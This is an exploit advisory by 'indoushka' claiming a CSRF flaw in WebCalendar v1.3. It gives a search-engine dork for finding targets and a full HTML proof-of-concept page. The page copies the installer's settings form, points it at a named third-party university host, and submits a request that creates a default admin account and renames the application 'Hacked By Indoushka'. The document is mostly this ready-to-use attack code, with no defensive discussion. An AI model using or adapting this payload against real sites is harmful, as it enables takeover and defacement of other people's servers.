====================================================================================================================================
| # Title : WebCalendar v1.3 CSRF Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) |
| # Vendor : https://github.com/craigk5n/webcalendar/archive/master.zip |
| # Dork : WebCalendar v1.3 |
====================================================================================================================================
poc :
[+] Dorking Ä°n Google Or Other Search Enggine.
[+] The following html code create a new admin .
[+] Go to the line 173.
[+] Set the target site link Save changes and apply .
[+] infected file : install/index.php.
[+] http://127.0.0.1/q7.3/admin/settings.php.
[+] save code as poc.html .
[+] <?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>WebCalendar Setup Wizard</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<script>
<!-- <![CDATA[
var xlate = [];
xlate['invalidColor'] = 'Invalid Color';
function testPHPInfo() {
var url = "index.php?action=phpinfo";
window.open( url, 'wcTestPHPInfo', 'width=800,height=600,resizable=yes,scrollbars=yes' );
}
function validate( form ) {
// Only check to make sure single-user login is specified
// if in single-user mode.
var
err = '',
form = document.form_app_settings,
listid = 0; // Find id of single user object.
for( i = 0; i < form.form_user_inc.length; i++ ) {
if( form.form_user_inc.options[i].value == 'none' )
listid = i;
}
if( form.form_user_inc.options[listid].selected ) {
if( form.form_single_user_login.value.length == 0 ) {
// No single user login specified.
alert( 'Error: You must specify a\nSingle-User Login.' );
form.form_single_user_login.focus();
return false;
}
}
if( form.form_server_url.value == '' ) {
err += "Server URL is required.\n";
form.form_server_url.select();
form.form_server_url.focus();
}
else if( form.form_server_url.value.charAt(
form.form_server_url.value.length - 1 ) != '/' ) {
err += "Server URL must end with a slash(/).\n";
form.form_server_url.select();
form.form_server_url.focus();
}
if( err != '' ) {
alert( "Error:\n\n" + err );
return false;
}
// Submit form...
form.submit();
}
function auth_handler() {
var
form = document.form_app_settings,
listid = 0; // Find id of single user object.
for( i = 0; i < form.form_user_inc.length; i++ ) {
if( form.form_user_inc.options[i].value == 'none' )
listid = i;
}
if( form.form_user_inc.options[listid].selected ) {
makeVisible( 'singleuser' );
} else {
makeInvisible( 'singleuser' );
}
}
function db_type_handler() {
var
form = document.dbform,
listid = 0,
selectvalue = form.form_db_type.value;
if( selectvalue == 'sqlite' || $db_type == 'sqlite3'
|| selectvalue == 'ibase' ) {
form.form_db_database.size = 65;
document.getElementById( 'db_name' ).innerHTML = 'Database Name: Full Path (no backslashes)';
} else {
form.form_db_database.size = 20;
document.getElementById( 'db_name' ).innerHTML = 'Database Name: ';
}
}
function chkPassword() {
var
form = document.dbform,
db_pass = form.form_db_password.value,
illegalChars = /\#/;
// Do not allow #.../\#/ would stop all non-alphanumeric.
if( illegalChars.test( db_pass ) ) {
alert( 'The password contains illegal characters.' );
form.form_db_password.select();
form.form_db_password.focus();
return false;
}
}
//]]> -->
</script>
<script src="../includes/js/visible.js"></script>
<style>
body {
margin:0;
background:#fff;
font-family:Arial, Helvetica, sans-serif;
}
table {
border:0;
}
th.header,
th.pageheader,
th.redheader {
background:#eee;
}
th.pageheader {
padding:10px;
font-size:18px;
}
th.header,
th.redheader {
font-size:14px;
}
th.redheader,
.notrecommended {
color:red;
}
td {
padding:5px;
}
td.prompt,
td.subprompt {
padding-right:20px;
font-weight:bold;
}
td.subprompt {
font-size:12px;
}
div.nav {
margin:0;
border-bottom:1px solid #000;
}
div.main {
margin:10px;
}
li {
margin-top:10px;
}
doc.li {
margin-top:5px;
}
.recommended {
color:green;
}
</style>
</head>
<body onload="auth_handler();">
<table border="1" width="90%" class="aligncenter">
<th class="pageheader" colspan="2">WebCalendar Installation Wizard Step 4</th>
<tr>
<td colspan="2" width="50%">This is the final step in setting up your WebCalendar Installation.</td>
</tr>
<th class="header" colspan="2">Application Settings</th>
<tr>
<td colspan="2">
<ul><li>HTTP-based authentication was not detected. You will need to reconfigure your web server if you wish to select 'Web Server' from the 'User Authentication' choices below.</li></ul>
</td>
</tr>
<tr>
<td>
<table width="75%" class="aligncenter">
<tr>
<form action="http://phase.ups-tlse.fr/webcalendar/install/index.php?action=switch&page=4" method="post" enctype='multipart/form-data' name="form_app_settings">
<input type="hidden" name="app_settings" value="1" />
<td class="prompt">Create Default Admin Account:</td>
<td>
<input type="checkbox" name="load_admin" value="Yes" />
<span class="notrecommended"> (Admin Account Not Found)</span>
</td>
</tr>
<tr>
<td class="prompt">Application Name:</td>
<td><input type="text" size="40" name="form_application_name" id="form_application_name" value="Hacked By Indoushka" /></td>
</tr>
<tr>
<td class="prompt">Server URL:</td>
<td><input type="text" size="40" name="form_server_url" id="form_server_url" value="http://phase.ups-tlse.fr/webcalendar/" /></td>
</tr>
<tr>
<td class="prompt">User Authentication:</td>
<td>
<select name="form_user_inc" onChange="auth_handler()">
<option value="user.php" selected="selected">Web-based via WebCalendar (default)</option>
<option value="http">Web Server (not detected)</option>
<option value="user-imap.php">IMAP</option>
<option value="none" >None (Single-User)</option>
</select>
</td>
</tr>
<tr id="singleuser">
<td class="prompt"> Single-User Login:</td>
<td><input name="form_single_user_login" size="20" value="" /></td>
</tr>
<tr>
<td class="prompt">Read-Only:</td>
<td>
<input name="form_readonly" value="true" type="radio" />Yes
<input name="form_readonly" value="false" type="radio" checked="checked" />No
</td>
</tr>
<tr>
<td class="prompt">Environment:</td>
<td>
<select name="form_mode">
<option value="prod" selected="selected">Production</option>
<option value="dev">Development</option>
</select>
</td>
</tr>
</table>
</td>
</tr>
</table>
<table width="80%" class="aligncenter">
<tr>
<td class="aligncenter">
<input name="action" type="button" value="Save Settings" onClick="return validate();" />
<input type="button" value="Logout" onclick="document.location.href='index.php?action=logout'" />
</form>
</td>
</tr>
</table> </body>
</html>
Greetings to :=================================================================
jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |
===============================================================================